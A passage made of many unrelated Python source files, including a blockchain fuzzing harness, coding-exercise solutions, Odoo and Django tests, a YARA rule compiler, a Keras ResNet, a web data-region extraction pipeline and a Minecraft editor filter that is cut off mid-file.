configs_path = "/eth2/eth2.0-specs/configs"
# TODO allow this to be adjusted?
presets = loader.load_presets(configs_path, "mainnet")
spec.apply_constants_preset(presets)
class BlockHeaderTestCase(spec.Container):
pre: spec.BeaconState
block: spec.BeaconBlock
block_header_sedes = translate_typ(BlockHeaderTestCase)
def FuzzerInit(bls_disabled: bool) -> None:
if bls_disabled:
bls.bls_active = False
def FuzzerRunOne(input_data: bytes) -> typing.Optional[bytes]:
test_case = translate_value(
block_header_sedes.deserialize(input_data), BlockHeaderTestCase
)
try:
# modifies state in place
spec.process_block_header(state=test_case.pre, block=test_case.block)
# NOTE - signature verification should do nothing with bls disabled
return serialize(test_case.pre)
except (AssertionError, IndexError):
return None
|
import re
from wedc.domain.core.data import cleaner
from wedc.domain.vendor.crf.crf_tokenizer import CrfTokenizer
def parse(text):
text = text_preprocessing(text)
t = CrfTokenizer()
t.setRecognizeHtmlEntities(True)
t.setRecognizeHtmlTags(True)
t.setSkipHtmlTags(True)
tokens = t.tokenize(text)
tokens = [token_preprocessing(token) for token in tokens]
tokens = [_ for _ in tokens if _]
return str(' '.join(set(tokens)))
def text_preprocessing(text):
return cleaner.clean_text(text)
def token_preprocessing(token):
return cleaner.clean_token(token)
|
a = [1,9,8,7]
b = a[:]
b[2] = 7
print(f'Lista A: {a}')
print(f'Lista B: {b}') |
class Solution:
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
str_ = str.split(" ")
dic_s = {}
dic_p = {}
res_s = []
res_p = []
for i in range(len(str_)):
if str_[i] in dic_s:
dic_s[str_[i]].append(i)
else:
dic_s[str_[i]] = [i]
for j in range(len(pattern)):
if pattern[j] in dic_p:
dic_p[pattern[j]].append(j)
else:
dic_p[pattern[j]] = [j]
for x in dic_s:
res_s.append(dic_s[x])
for y in dic_p:
res_p.append(dic_p[y])
return res_s == res_p
|
import unittest
from katas.kyu_7.tube_strike_options_calculator import calculator
class TubeStrikeTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(calculator(5, 6, 1), 'Bus')
def test_equals_2(self):
self.assertEqual(calculator(4, 5, 1), 'Walk')
def test_equals_3(self):
self.assertEqual(calculator(5, 8, 0), 'Walk')
def test_equals_4(self):
self.assertEqual(calculator(5, 4, 3), 'Walk')
def test_equals_5(self):
self.assertEqual(calculator(11, 15, 2), 'Bus')
def test_equals_6(self):
self.assertEqual(calculator(0.6, 0.4, 0), 'Walk')
|
"""
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import string
from level import *
class EntityLoggerProxy(object):
"""
Originally there was a singleton logger, but to support a prefix for
which entity the log statement belonged to, this proxy class was created.
"""
entity = None
logger = None
formatter = None
@classmethod
def setLogger(cls, logger):
cls.logger = logger
@classmethod
def getLogger(cls):
return cls.logger
@classmethod
def setFormatter(cls, formatter):
cls.formatter = formatter
@classmethod
def getLevel(cls):
return cls.logger.getEffectiveLevel()
@classmethod
def setLevel(self, level):
self.logger.setLevel(level)
self.logger.log(level, None, "Changing logging level")
def __init__(self, entity=None, level=None):
self.entity = entity # associate an entity with this logger
if level:
self.setLevel(level)
def setEntity(self, entity):
self.entity = entity
def log(self, level, msg, *args, **kwargs):
# Set formatter to the logging level of this log statement
for arg in args:
arg.setLogLevel(level)
# Remove extra %
if len(args) > 0: # if there are no args supplied for str replacement, don't even try
msg = string.replace(msg, r'%%s',r'%s')
msg = msg % args
# Formulate the prefix for this log statement
prefix = "%s " % str(self.formatter(self.entity).setLogLevel(level)) if self.entity else ''
self.logger.log(level, prefix + msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
""" Override to support keywords """
self.log(INFO, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
""" Override to support keywords """
self.log(WARN, msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
""" Override to support keywords """
self.log(DEBUG, msg, *args, **kwargs)
def trace(self, msg, *args, **kwargs):
self.log(TRACE, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
""" Override to support keywords """
self.log(ERROR, msg, *args, **kwargs)
def getFormatter(self):
return self.formatter
|
# Copyright 2018 Ildar Nasyrov <https://it-projects.info/team/iledarn>
# License MIT (https://opensource.org/licenses/MIT).
from odoo.tests.common import TransactionCase
class TestDeliveryCarrierSecurity(TransactionCase):
at_install = True
post_install = True
def setUp(self):
super(TestDeliveryCarrierSecurity, self).setUp()
self.website = self.env.ref("website.website2")
self.company = self.env["res.company"].create({"name": "New Test Website"})
self.website.company_id = self.company
self.user = self.env.ref(
"website_multi_company_sale_delivery.delivery_carrier_read_user"
)
# self.user.write({'company_ids': [(4, self.company.id)], 'company_id': self.env.ref("base.main_company").id})
self.user.write(
{"company_ids": [(4, self.company.id)], "company_id": self.company.id}
)
self.country = self.env.ref("base.us")
self.state = self.env.ref("base.state_us_2")
self.delivery_carrier = self.env.ref("delivery.delivery_carrier")
self.delivery_carrier.write(
{
"website_ids": [(4, self.website.id)],
"country_ids": [(6, 0, [self.country.id])],
"state_ids": [(6, 0, [self.state.id])],
}
)
other_carriers = self.env.ref(
"delivery.normal_delivery_carrier"
) + self.env.ref("delivery.free_delivery_carrier")
other_carriers.write(
{"website_ids": [(4, self.env.ref("website.default_website").id)]}
)
self.all_carriers = other_carriers + self.delivery_carrier
self.all_carriers.write({"website_published": True})
def test_get_website_sale_countries_and_states(self):
countries = self.country.with_context(
website_id=self.website.id
).get_website_sale_countries(mode="shipping")
states = self.country.with_context(
website_id=self.website.id
).get_website_sale_states(mode="shipping")
self.assertEqual(countries, self.country)
self.assertEqual(states, self.state)
def test_get_delivery_carriers(self):
# for frontend (there is website_id in context)
delivery_carriers = (
self.env["delivery.carrier"]
.sudo(self.user)
.with_context(website_id=self.website.id)
.search([("website_published", "=", True)])
)
self.assertNotEqual(self.all_carriers, delivery_carriers)
self.assertEqual(self.delivery_carrier, delivery_carriers)
# for backend (no website_id in context and no backend_website_id in the user's settings either - all published carriers should get found
self.user.backend_website_id = None
delivery_carriers = (
self.env["delivery.carrier"]
.sudo(self.user)
.search([("website_published", "=", True)])
)
self.assertEqual(self.all_carriers, delivery_carriers)
|
#!/usr/bin/env python
import json
from os import path
import sys
from time import time_ns
from gpiozero import DigitalOutputDevice
def load_data(command):
with open(path.join(path.dirname(path.realpath(__file__)), 'commands', command + '.json')) as file:
return json.load(file)
def transmit_data(data):
line = DigitalOutputDevice(17)
start_time = time_ns() / 1e9
i = 0
while i < len(data):
entry = data[i]
time = entry['time']
if time_ns() / 1e9 - start_time > time:
line.value = entry ['signal']
i = i + 1
line.value = 0
data = load_data(sys.argv[1])
transmit_data(data) |
import configparser
import sys
import requests
import yara
ERROR_CODE = 1
def DownloadFile(url, rulefile):
r = requests.get(url, stream=True)
with open(rulefile, 'wb') as f:
for chunk in r.iter_content(chunk_size=(100*1024)):
if chunk:
f.write(chunk)
def main():
""" Main logic for program """
cfg = configparser.ConfigParser()
cfg.read('service.conf')
rule_location = 'rules.yar'
get_remote = False
# Parse configuration options
if cfg.has_section('yara_rules'):
rule_location = cfg['yara_rules'].get('local_path', fallback='rules.yar')
get_remote = cfg['yara_rules'].getboolean('get_remote', fallback=False)
if get_remote:
DownloadFile(cfg['yara_rules'].get('download_url'), rule_location)
else:
print("Configuration Error: Cannot find Rules section. Using default values.")
# attempt to compile rules
try:
rules = yara.compile(rule_location)
rules.save(rule_location)
except YaraSyntaxError:
print("Syntax error in the YARA rules.")
sys.exit(ERROR_CODE)
except YaraError:
print("Unknown YARA error.")
sys.exit(ERROR_CODE)
except Exception as e:
print(e)
sys.exit(ERROR_CODE)
return 0
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
sys.exit(ERROR_CODE)
|
import os
genDir = os.path.join(os.path.dirname(os.path.relpath(__file__)),"../")
dir_name = 'run'
folders = os.listdir(genDir + "./%s"%(dir_name))
current = os.getcwd()
print("Temp,Frequency,Power,Error")
#print(current)
for folder in folders:
os.chdir("%s/%s/%s"%(current,dir_name,folder))
os.system("source cal_result")
for folder in folders:
f = open("%s/%s/%s/code_result_with_error"%(current,dir_name,folder),'r')
data = f.read()
print(data)
|
from . import core
from . import random
from .core import *
from .random import *
|
'''
Created on Dec 12, 2020
@author: liu.zhengr
'''
import socket
import os
import sys
import struct
class ImageSocketConnector():
def __init__(self):
self.address = ('127.0.0.1', 5612)
def send(self, filePath:str):
"""Send picture to server
param: filePath File path
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(self.address)
except socket.error as msg:
print(msg)
sys.exit(1)
if os.path.isfile(filePath):
# 定义定义文件信息。128s表示文件名为128bytes长,l表示一个int或log文件类型,在此为文件大小
fileinfo_size = struct.calcsize('128sl')
# 定义文件头信息,包含文件名和文件大小
#fhead = struct.pack('128sl', bytes(os.path.basename(filepath).encode('utf-8')),os.stat(filepath).st_size)
#print("1")
#s.send(fhead)
print ('client filepath: {0}'.format(filePath))
fp = open(filePath, 'rb')
while 1:
data = fp.read(1024)
if not data:
print ('{0} file send over...'.format(filePath))
break
s.send(data)
s.close() |
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
"""
Given an array nums of n integers, are there elements
a, b, c in nums such that a + b + c = 0? Find all unique
triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
"""
nums.sort()
numlen = len(nums)
ans = []
for i in range(numlen-2):
if i>0 and nums[i]==nums[i-1]:
continue
j = i+1
k = numlen-1
while j<k:
sum3 = nums[i]+nums[j]+nums[k]
if sum3==0:
ans.append([nums[i],nums[j],nums[k]])
while j<k and nums[j]==nums[j+1]:
j+=1
j+=1
while j<k and nums[k]==nums[k-1]:
k-=1
k-=1
elif sum3<0:
j+=1
else:
k-=1
return ans |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------------------------------------------------
# arclytics_sim
# utilities.py
#
# Attributions:
# [1]
# ----------------------------------------------------------------------------------------------------------------------
__author__ = ['Andrew Che <@codeninja55>']
__license__ = 'MIT'
__version__ = '2.0.0'
__status__ = 'production'
__date__ = '2019.10.02'
"""utilities.py:
Utilities for extensions that are not clearly defined.
"""
import decimal
import json
from datetime import datetime
import numpy as np
from bson import ObjectId
API_TOKEN_NAME = 'JWT_TOKEN'
class JSONEncoder(json.JSONEncoder):
"""Extends the json-encoder to properly convert dates and bson.ObjectId"""
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
if isinstance(o, set):
return list(o)
if isinstance(o, np.ndarray):
return o.tolist()
if isinstance(o, datetime):
return str(o.isoformat())
if isinstance(o, np.int):
return int(o)
if isinstance(o, np.int16):
return int(o)
if isinstance(o, np.int32):
return int(o)
if isinstance(o, np.int64):
return int(o)
if isinstance(o, np.float):
return str(o)
if isinstance(o, np.float64):
return str(o)
if isinstance(o, np.float64):
return str(o)
if isinstance(o, decimal.Decimal):
return str(o)
return json.JSONEncoder.default(self, o)
|
import tensorflow as tf
from tensorflow.keras import layers, Sequential, Model
class BasicBlock(layers.Layer):
def __init__(self, kernels, stride=1):
super(BasicBlock, self).__init__()
self.features = Sequential([
layers.Conv2D(kernels, (3, 3), strides=stride, padding='same'),
layers.BatchNormalization(),
layers.ReLU(),
layers.Conv2D(kernels, (3, 3), strides=1, padding='same'),
layers.BatchNormalization()
])
if stride != 1:
shortcut = [
layers.Conv2D(kernels, (1, 1), strides=stride),
layers.BatchNormalization()
]
else:
shortcut = []
self.shorcut = Sequential(shortcut)
def call(self, inputs, training=False):
residual = self.shorcut(inputs, training=training)
x = self.features(inputs, training=training)
x = tf.nn.relu(layers.add([residual, x]))
return x
class BottleNeckBlock(layers.Layer):
def __init__(self, kernels, stride=1):
super(BottleNeckBlock, self).__init__()
self.features = Sequential([
layers.Conv2D(kernels, (1, 1), strides=1, padding='same'),
layers.BatchNormalization(),
layers.Conv2D(kernels, (3, 3), strides=stride, padding='same'),
layers.BatchNormalization(),
layers.Conv2D(kernels * 4, (1, 1), strides=1, padding='same'),
layers.BatchNormalization(),
])
self.shorcut = Sequential([
layers.Conv2D(kernels * 4, (1, 1), strides=stride),
layers.BatchNormalization()
])
def call(self, inputs, training=False):
residual = self.shorcut(inputs, training=training)
x = self.features(inputs, training=training)
x = tf.nn.relu(x + residual)
return x
class ResNet(Model):
def __init__(self, block, num_blocks, num_classes, input_shape=(32, 32, 3)):
super(ResNet, self).__init__()
self.conv1 = Sequential([
layers.Input(input_shape),
layers.Conv2D(64, (3, 3), padding='same', use_bias=False),
layers.BatchNormalization(),
layers.ReLU()
])
self.conv2_x = self._make_layer(block, 64, num_blocks[0], 1)
self.conv3_x = self._make_layer(block, 128, num_blocks[1], 2)
self.conv4_x = self._make_layer(block, 256, num_blocks[2], 2)
self.conv5_x = self._make_layer(block, 512, num_blocks[3], 2)
self.gap = layers.GlobalAveragePooling2D()
self.fc = layers.Dense(num_classes, activation='softmax')
def _make_layer(self, block, kernels, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
nets = []
for stride in strides:
nets.append(block(kernels, stride))
return Sequential(nets)
def call(self, inputs):
x = self.conv1(inputs)
x = self.conv2_x(x)
x = self.conv3_x(x)
x = self.conv4_x(x)
x = self.conv5_x(x)
x = self.gap(x)
x = self.fc(x)
return x
def ResNet18(num_classes):
return ResNet(BasicBlock, [2, 2, 2, 2], num_classes)
def ResNet34(num_classes):
return ResNet(BasicBlock, [3, 4, 6, 3], num_classes)
def ResNet50(num_classes):
return ResNet(BottleNeckBlock, [3, 4, 6, 3], num_classes)
def ResNet101(num_classes):
return ResNet(BottleNeckBlock, [3, 4, 23, 3], num_classes)
def ResNet152(num_classes):
return ResNet(BottleNeckBlock, [3, 8, 36, 3], num_classes)
|
from six.moves import cStringIO
from pysmt.smtlib.parser import SmtLibParser
from pysmt.shortcuts import get_model, Solver
import types
DEMO_SMTLIB= \
"""
(set-logic QF_AUFBV )
(declare-fun A-data () (Array (_ BitVec 32) (_ BitVec 8) ) )
(assert (and (= (_ bv108 8) (select A-data (_ bv2 32) ) ) (= (_ bv101 8) (select A-data (_ bv1 32) ) ) ) )
(check-sat)
"""
parser = SmtLibParser()
script = parser.get_script(cStringIO(DEMO_SMTLIB))
f = script.get_last_formula()
model = get_model(f, solver_name="z3")
print(model)
print(str(model.__dict__))
py_model = model.__dict__['z3_model']
for decl in py_model.decls():
print(decl.kind())
print(decl.name())
print(decl.params())
print(decl.range())
print(py_model[decl])
a = py_model[decl].as_list()
for x in a:
print(str(type(x) == list))
print("x=" + str(x))
# help(a)
# help(py_model)
# print(py_model)
# help(model.converter) |
"""
Module dependencies:
all - {core, files_management, utils} -> prepostprocessing
"""
import datetime
import logging
import urllib
import urllib.request
import urllib.response
from typing import Tuple
import lxml
import lxml.etree
import lxml.html
import retrying
import core
import files_management as fm
logging.basicConfig(
level=logging.INFO,
format="%(levelname)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s",
)
SEC = 1000 # in ms
all_metas = fm.PageMeta.get_all()
def download_raw(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.raw_html.exists()
if exists:
logging.info(
"Raw page has already been downloaded. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be downloaded. page_id=%s", page_meta.page_id)
@retrying.retry(
stop_max_attempt_number=10,
wait_exponential_multiplier=SEC,
wait_exponential_max=10 * SEC,
wrap_exception=True,
)
def call_url():
logging.info("Requesting the page... page_id=%s", page_meta.page_id)
response = urllib.request.urlopen(page_meta.url, timeout=10)
page_binary = response.read()
return page_binary
try:
page = call_url()
except retrying.RetryError:
logging.warning(
"Failed download the page, returning. page_id=%s", page_meta.page_id,
)
return
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.raw_html, page)
logging.info("Saving download time in metadata file. page_id=%s", page_meta.page_id)
now = datetime.datetime.now()
page_meta.persist_download_datetime(now)
logging.info("Done. page_id=%s", page_meta.page_id)
def cleanup_html(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.preprocessed_html.exists()
if exists:
logging.info(
"Page has already been preprocessed. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be preprocessed. page_id=%s", page_meta.page_id)
logging.info(
"Opening raw html file by removing stuff. page_id=%s", page_meta.page_id,
)
doc = fm.open_html_document(page_meta.raw_html, remove_stuff=True)
logging.info(
"Stripping <meta>, <script>, and <style> tags. page_id=%s", page_meta.page_id,
)
lxml.etree.strip_elements(doc, "script")
lxml.etree.strip_elements(doc, "style")
lxml.etree.strip_elements(doc, "meta")
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.preprocessed_html, doc)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_distances(
page_meta: fm.PageMeta, minimum_depth, max_tag_per_gnode, force_override: bool = False
):
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.distances_pkl.exists()
if exists:
logging.info(
"Distances have already been precomputed, checking parameters... page_id=%s",
page_meta.page_id,
)
precomputed = page_meta.load_precomputed_distances()
precomputed_minimum_depth = precomputed["minimum_depth"]
precomputed_max_tag_per_gnode = precomputed["max_tag_per_gnode"]
precomputed_was_more_restrictive = (
precomputed_max_tag_per_gnode < max_tag_per_gnode
or precomputed_minimum_depth > minimum_depth
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
elif precomputed_was_more_restrictive:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s",
page_meta.page_id,
)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("The distances will be computed. page_id=%s", page_meta.page_id)
node_namer, doc = get_named_nodes_html(page_meta)
logging.info("Computing distances. page_id=%s", page_meta.page_id)
distances = {}
core.compute_distances(doc, distances, {}, node_namer, minimum_depth, max_tag_per_gnode)
logging.info("Persisting distances. page_id=%s", page_meta.page_id)
page_meta.persist_precomputed_distances(distances, minimum_depth, max_tag_per_gnode)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_data_regions(
page_meta: fm.PageMeta,
threshold: float,
minimum_depth: int,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
exists = page_meta.data_regions_pkl(threshold, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data regions have already been precomputed, checking parameters... page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
precomputed = page_meta.load_precomputed_data_regions(threshold, max_tags_per_gnode)
precomputed_minimum_depth = precomputed["minimum_depth"]
if precomputed_minimum_depth > minimum_depth:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
logging.info(
"Operation skipped. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data regions will be computed. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed distances. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
logging.info(
"Starting to compute data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
data_regions = {}
core.find_data_regions(
root, node_namer, minimum_depth, distances, data_regions, threshold, max_tags_per_gnode
)
logging.info(
"Persisting data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_regions(
data_regions, threshold, minimum_depth, max_tags_per_gnode
)
logging.info(
"Done. page_id=%s th=%.2f max_tags=%d", page_meta.page_id, threshold, max_tags_per_gnode
)
def precompute_data_records(
page_meta: fm.PageMeta,
thresholds: core.MDREditDistanceThresholds,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
assert page_meta.data_regions_pkl(
thresholds.data_region, max_tags_per_gnode
), "Data regions have NOT been precomputed!"
exists = page_meta.data_records_pkl(thresholds, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data records have already been precomputed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
else:
# todo(improvement) include min depth checking????
logging.info(
"Operation skipped. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data records will be computed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed data regions. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
data_regions = page_meta.load_precomputed_data_regions(
thresholds.data_region, max_tags_per_gnode
)
logging.info(
"Starting to compute data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
data_records = core.find_data_records(
root, data_regions, distances, node_namer, thresholds, max_tags_per_gnode
)
logging.info(
"Persisting data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_records(data_records, thresholds, max_tags_per_gnode)
logging.info(
"Done. page_id=%s th=%s max_tags=%d", page_meta.page_id, thresholds, max_tags_per_gnode
)
def get_named_nodes_html(page_meta: fm.PageMeta) -> Tuple[core.NodeNamer, lxml.html.HtmlElement]:
if page_meta.named_nodes_html.exists():
logging.info(
"Loading the named nodes html. page_id=%s", page_meta.page_id,
)
root = page_meta.get_named_nodes_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer(for_loaded_file=True)
else:
logging.info(
"Named nodes have NOT been saved, computing it. page_id=%s", page_meta.page_id,
)
assert page_meta.preprocessed_html.exists()
logging.info("Opening preprocessed html. page_id=%s", page_meta.page_id)
root = page_meta.get_preprocessed_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer()
node_namer.load(root)
logging.info(
"Saving named nodes html. page_id=%s", page_meta.page_id,
)
fm.PageMeta.persist_html(page_meta.named_nodes_html, root)
return node_namer, root
def color_html(page_meta: fm.PageMeta, mdr: core.MDR) -> None:
pass
|
# Test Helpers
from django.test import TestCase, Client
from django.urls import reverse
import json
# Models
from ...models.author import Author
from ...models.signupRequest import Signup_Request
class TestAuthView(TestCase):
def setUp(self):
self.client = Client()
# Urls
self.register_url = reverse('register-author')
self.login_url = reverse('login')
self.get_current_author_url = reverse('get-current-author')
# Mock Data for POST
self.mock_author_instance = Author.objects.create_user(
username="testusername",
password="testpassword",
displayName='testUser',
host="http://localhost:8000",
)
self.mock_author_instance.is_active = True
self.mock_author_instance.save()
def test_register_POST(self):
# Register Fake User
self.mock_author_register = {
'username': 'testusername1',
'password': 'testpassword',
'displayName': 'Test DisplayName',
'github': 'https://github.com/',
}
# Check that the user we are about to add does not already exist
self.assertEqual(Signup_Request.objects.filter(username="testusername1").exists(), False)
# Make request to create a signup request for this new user
response = self.client.post(
self.register_url,
self.mock_author_register,
content_type="application/json", SERVER_NAME="localhost:8000")
self.assertEqual(response.status_code, 201)
# Check that a signup request was made
self.assertEqual(Signup_Request.objects.filter(username="testusername1").exists(), True)
def test_login_success_POST(self):
# Attempt to login using the username and password of the mock_author
response = self.client.post(
self.login_url,
{'username': 'testusername', 'password': 'testpassword'},
content_type="application/json",
)
self.assertEqual(response.status_code, 200)
self.assertTrue('token' in response.data.keys())
self.assertTrue('user' in response.data.keys())
def test_login_fail_POST(self):
# Attempt to login using the username and password of the mock_author
response = self.client.post(
self.login_url,
{'username': 'testusernamedoesntexist', 'password': 'testpassword'},
content_type="application/json",
)
self.assertEqual(response.status_code, 401)
def test_token_valid_success_POST(self):
# Attempt to login using the username and password of the mock_author
response = self.client.post(
self.login_url,
{'username': 'testusername', 'password': 'testpassword'},
content_type="application/json",
)
token = response.data['token']
headers = {
'HTTP_AUTHORIZATION': f"Bearer {token}"
}
# Get the current user using the token
response = self.client.get(self.get_current_author_url, **headers)
self.assertEqual(response.status_code, 200)
def test_token_valid_fail_POST(self):
# Attempt to login using the username and password of the mock_author
headers = {
'HTTP_AUTHORIZATION': f"Bearer sometokenthatijustmadeup",
'HTTP_Origin': 'http://localhost:3000/'
}
# Get the current user using the token
response = self.client.get(self.get_current_author_url, **headers)
self.assertEqual(response.status_code, 403)
|
import streamlit as st
import visao_geral
import estacao
import responsavel
# Hide Menu
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.image("imgs/smtr-logo.jpeg")
st.title("Avaliação das estações BRT")
res = st.radio("Selecione uma Visão", ["Geral", "Estações", "Responsáveis"])
if res == "Geral":
visao_geral.main()
elif res == "Estações":
estacao.main()
else:
responsavel.main() |
# Feel free to modify and use this filter however you wish. If you do,
# please give credit to SethBling.
# http://youtube.com/SethBling
from pymclevel import TAG_List
from pymclevel import TAG_Byte
from pymclevel import TAG_Int
from pymclevel import TAG_Compound
from pymclevel import TAG_Short
from pymclevel import TAG_Double
from pymclevel import TAG_String
displayName = "Change Mob Properties"
Professions = {
"Farmer (brown)": 0,
"Librarian (white)": 1,
"Priest (purple)": 2,
"Blacksmith (black apron)": 3,
"Butcher (white apron)": 4,
"Villager (green)": 5,
}
ProfessionKeys = ("N/A",)
for key in Professions.keys():
ProfessionKeys = ProfessionKeys + (key,)
noop = -1337
inputs = (
("Health", noop),
("VelocityX", noop),
("VelocityY", noop),
("VelocityZ", noop),
("Fire", noop),
("FallDistance", noop),
("Air", noop),
("AttackTime", noop),
("HurtTime", noop),
("Lightning Creeper", ("N/A", "Lightning", "No Lightning")),
("Enderman Block Id", noop),
("Enderman Block Data", noop),
("Villager Profession", ProfessionKeys),
("Slime Size", noop),
("Breeding Mode Ticks", noop),
("Child/Adult Age", noop),
)
def perform(level, box, options):
health = options["Health"]
vx = options["VelocityX"]
vy = options["VelocityY"]
vz = options["VelocityZ"]
fire = options["Fire"]
fall = options["FallDistance"]
air = options["Air"]
attackTime = options["AttackTime"]
hurtTime = options["HurtTime"]
powered = options["Lightning Creeper"]
blockId = options["Enderman Block Id"]
blockData = options["Enderman Block Data"]
profession = options["Villager Profession"]
size = options["Slime Size"]
breedTicks = options["Breeding Mode Ticks"]
age = options["Child/Adult Age"]
for (chunk, slices, point) in level.getChunkSlices(box):
for e in chunk.Entities:
x = e["Pos"][0].value
y = e["Pos"][1].value
z = e["Pos"][2].value
if x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:
if "Health" in e:
if health != noop:
e["Health"] = TAG_Short(health)
if vx != noop:
e["Motion"][0] = TAG_Double(vx)
if vy != noop:
e["Motion"][1] = TAG_Double(vy)
if vz != noop:
e["Motion"][2] = TAG_Double(vz)
if fire != noop:
e["Fire"] = TAG_Short(fire)
if fall != noop:
e["FallDistance"] = TAG_Float(fall)
if air != noop:
e["Air"] = TAG_Short(air)
if attackTime != noop:
e["AttackTime"] = TAG_Short(attackTime)
if hurtTime != noop:
e["HurtTime"] = TAG_Short(hurtTime)
if powered != "N/A" and e["id"].value == "Creeper":
if powered == "Lightning":
e["powered"] = TAG_Byte(1)
if powered == "No Lightning":
